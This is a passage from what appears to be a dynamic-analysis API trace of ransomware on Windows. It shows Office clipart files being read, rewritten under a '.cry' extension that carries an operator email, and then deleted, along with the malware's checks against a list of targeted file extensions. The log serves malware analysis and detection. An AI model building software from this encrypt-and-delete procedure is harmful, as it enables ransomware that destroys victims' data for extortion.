office\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0050.843] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.843] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0050.844] GetLastError () returned 0x0 [0050.844] ReadFile (in: hFile=0x1f0, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x1a1c, lpOverlapped=0x0) returned 1 [0050.858] WriteFile (in: hFile=0x22c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x1a20, lpOverlapped=0x0) returned 1 [0050.859] ReadFile (in: hFile=0x1f0, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.859] WriteFile (in: hFile=0x22c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.859] SetEndOfFile (hFile=0x22c) returned 1 [0050.860] CloseHandle (hObject=0x22c) returned 1 [0050.860] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.860] SetEndOfFile (hFile=0x1f0) returned 1 [0050.860] CloseHandle (hObject=0x1f0) returned 1 [0050.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.861] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif")) returned 1 [0050.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.861] lstrlenW (lpString=".doc") returned 4 [0050.861] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.861] lstrlenW (lpString=".docx") returned 5 [0050.861] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.861] lstrlenW (lpString=".pdf") returned 4 [0050.861] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.861] lstrlenW (lpString=".xls") returned 4 [0050.861] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.861] lstrlenW (lpString=".xlsx") returned 5 [0050.861] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.861] lstrlenW (lpString=".ppt") returned 4 [0050.861] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.861] lstrlenW (lpString=".zip") returned 4 [0050.861] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.861] lstrlenW (lpString=".rar") returned 4 [0050.861] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.861] lstrlenW (lpString=".bz2") returned 4 [0050.861] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.861] lstrlenW (lpString=".7z") returned 3 [0050.861] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.862] lstrlenW (lpString=".dbf") returned 4 [0050.862] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.862] lstrlenW (lpString=".1cd") returned 4 [0050.862] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.862] lstrlenW (lpString=".jpg") returned 4 [0050.862] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.862] lstrlenW (lpString=".doc") returned 4 [0050.862] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.862] lstrlenW (lpString=".docx") returned 5 [0050.862] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.862] lstrlenW (lpString=".pdf") returned 4 [0050.862] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.862] lstrlenW (lpString=".xls") returned 4 [0050.862] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.862] lstrlenW (lpString=".xlsx") returned 5 [0050.862] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.862] lstrlenW (lpString=".ppt") returned 4 [0050.862] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.862] lstrlenW (lpString=".zip") returned 4 [0050.862] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.862] lstrlenW (lpString=".rar") returned 4 [0050.862] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.862] lstrlenW (lpString=".bz2") returned 4 [0050.862] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.863] lstrlenW (lpString=".7z") returned 3 [0050.863] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.863] lstrlenW (lpString=".dbf") returned 4 [0050.863] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.863] lstrlenW (lpString=".1cd") returned 4 [0050.863] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.863] lstrlenW (lpString=".jpg") returned 4 [0050.863] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.863] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0050.863] lstrlenW (lpString="AG00038_.GIF") returned 12 [0050.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0050.943] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=3251) returned 1 [0050.943] CloseHandle (hObject=0x1c4) returned 1 [0050.943] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif")) returned 0x20 [0050.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0050.944] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.944] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0050.944] GetLastError () returned 0x0 [0050.944] ReadFile (in: hFile=0x1c4, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0xcb3, lpOverlapped=0x0) returned 1 [0051.060] WriteFile (in: hFile=0x1f0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xcc0, lpOverlapped=0x0) returned 1 [0051.061] ReadFile (in: hFile=0x1c4, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.061] WriteFile (in: hFile=0x1f0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.061] SetEndOfFile (hFile=0x1f0) returned 1 [0051.062] CloseHandle (hObject=0x1f0) returned 1 [0051.062] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.062] SetEndOfFile (hFile=0x1c4) returned 1 [0051.062] CloseHandle (hObject=0x1c4) returned 1 [0051.062] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.063] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif")) returned 1 [0051.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0051.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0051.063] lstrlenW (lpString=".doc") returned 4 [0051.063] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.063] lstrlenW (lpString=".docx") returned 5 [0051.063] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.063] lstrlenW (lpString=".pdf") returned 4 [0051.063] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.063] lstrlenW (lpString=".xls") returned 4 [0051.063] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.063] lstrlenW (lpString=".xlsx") returned 5 [0051.063] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.063] lstrlenW (lpString=".ppt") returned 4 [0051.063] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0051.063] lstrlenW (lpString=".zip") returned 4 [0051.063] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.063] lstrlenW (lpString=".rar") returned 4 [0051.063] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.063] lstrlenW (lpString=".bz2") returned 4 [0051.063] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.063] lstrlenW (lpString=".7z") returned 3 [0051.063] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0051.063] lstrlenW (lpString=".dbf") returned 4 [0051.063] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0051.063] lstrlenW (lpString=".1cd") returned 4 [0051.064] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0051.064] lstrlenW (lpString=".jpg") returned 4 [0051.064] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0051.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0051.064] lstrlenW (lpString=".doc") returned 4 [0051.064] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.064] lstrlenW (lpString=".docx") returned 5 [0051.064] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.064] lstrlenW (lpString=".pdf") returned 4 [0051.064] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.064] lstrlenW (lpString=".xls") returned 4 [0051.064] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.064] lstrlenW (lpString=".xlsx") returned 5 [0051.064] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.064] lstrlenW (lpString=".ppt") returned 4 [0051.064] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0051.064] lstrlenW (lpString=".zip") returned 4 [0051.064] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.064] lstrlenW (lpString=".rar") returned 4 [0051.064] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.064] lstrlenW (lpString=".bz2") returned 4 [0051.064] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.064] lstrlenW (lpString=".7z") returned 3 [0051.064] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0051.064] lstrlenW (lpString=".dbf") returned 4 [0051.064] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0051.064] lstrlenW (lpString=".1cd") returned 4 [0051.064] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 63 [0051.064] lstrlenW (lpString=".jpg") returned 4 [0051.064] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.065] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0051.065] lstrlenW (lpString="AG00126_.GIF") returned 12 [0051.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0051.065] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=3140) returned 1 [0051.065] CloseHandle (hObject=0x1c4) returned 1 [0051.065] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif")) returned 0x20 [0051.065] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0051.065] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.065] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0051.066] GetLastError () returned 0x0 [0051.066] ReadFile (in: hFile=0x1c4, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0xc44, lpOverlapped=0x0) returned 1 [0051.215] WriteFile (in: hFile=0x1f0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xc50, lpOverlapped=0x0) returned 1 [0051.216] ReadFile (in: hFile=0x1c4, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.216] WriteFile (in: hFile=0x1f0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.216] SetEndOfFile (hFile=0x1f0) returned 1 [0051.216] CloseHandle (hObject=0x1f0) returned 1 [0051.216] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.216] SetEndOfFile (hFile=0x1c4) returned 1 [0051.217] CloseHandle (hObject=0x1c4) returned 1 [0051.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.217] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif")) returned 1 [0051.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0051.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0051.254] lstrlenW (lpString=".doc") returned 4 [0051.254] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.254] lstrlenW (lpString=".docx") returned 5 [0051.254] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.254] lstrlenW (lpString=".pdf") returned 4 [0051.254] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.254] lstrlenW (lpString=".xls") returned 4 [0051.254] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.254] lstrlenW (lpString=".xlsx") returned 5 [0051.254] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.256] lstrlenW (lpString=".ppt") returned 4 [0051.256] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0051.256] lstrlenW (lpString=".zip") returned 4 [0051.256] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.256] lstrlenW (lpString=".rar") returned 4 [0051.256] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.256] lstrlenW (lpString=".bz2") returned 4 [0051.256] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.256] lstrlenW (lpString=".7z") returned 3 [0051.256] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0051.256] lstrlenW (lpString=".dbf") returned 4 [0051.256] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0051.256] lstrlenW (lpString=".1cd") returned 4 [0051.256] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0051.256] lstrlenW (lpString=".jpg") returned 4 [0051.256] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0051.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0051.256] lstrlenW (lpString=".doc") returned 4 [0051.256] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.256] lstrlenW (lpString=".docx") returned 5 [0051.256] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.256] lstrlenW (lpString=".pdf") returned 4 [0051.256] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.256] lstrlenW (lpString=".xls") returned 4 [0051.256] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.256] lstrlenW (lpString=".xlsx") returned 5 [0051.256] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.256] lstrlenW (lpString=".ppt") returned 4 [0051.256] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0051.256] lstrlenW (lpString=".zip") returned 4 [0051.256] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.256] lstrlenW (lpString=".rar") returned 4 [0051.257] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.257] lstrlenW (lpString=".bz2") returned 4 [0051.257] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.257] lstrlenW (lpString=".7z") returned 3 [0051.257] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0051.257] lstrlenW (lpString=".dbf") returned 4 [0051.257] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0051.257] lstrlenW (lpString=".1cd") returned 4 [0051.257] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0051.257] lstrlenW (lpString=".jpg") returned 4 [0051.257] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.257] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0051.257] lstrlenW (lpString="AG00139_.GIF") returned 12 [0051.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.258] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=10607) returned 1 [0051.258] CloseHandle (hObject=0x20c) returned 1 [0051.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif")) returned 0x20 [0051.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.258] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.258] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft 